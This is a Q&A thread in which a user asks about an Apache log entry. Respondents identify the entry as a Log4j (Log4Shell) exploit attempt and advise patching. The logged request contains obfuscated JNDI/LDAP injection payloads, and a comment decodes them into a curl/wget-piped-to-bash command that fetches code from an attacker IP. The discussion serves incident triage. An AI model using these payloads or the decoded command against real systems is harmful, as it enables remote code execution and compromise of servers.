1

I see this entry in my apache access log, is anyone having an Idea what does it mean?

 195.54.160.149 - - [24/Dec/2021:17:30:03 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0Myl8YmFzaA==} HTTP/1.1" 200 10937 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzkuNTkuMzcuMjQ0OjQ0Myl8YmFzaA==}"
Aadam
  • 1,521
  • 9
  • 30
  • 60
  • That is a hacking string trying to connect to a ldap server from your website IP. The http return code is 200, so it has been processed correctly in some way from your website. You should investigate it further just in case your website is hacked. Depending of how you manage the non-existing pages it could be also a fake alarm. – masterguru Dec 24 '21 at 18:22
  • When decoding that base64 code it shows this: `(curl -s 195.54.160.149:5874/139.59.37.244:443||wget -q -O- 195.54.160.149:5874/139.59.37.244:443)|bash` so again it is trying to use your webserver to hack other places. – masterguru Dec 24 '21 at 18:23

1 Answers1

1

This is an exploit for the recent Log4j vulnerability. If you use Log4j anywhere you should ensure it is updated immediately. Otherwise, it's safe to disregard the attacks.

There is currently mass exploitation of this issue, so you will undoubtedly see these requests for a long time to come.

VirtueKB
  • 96
  • 4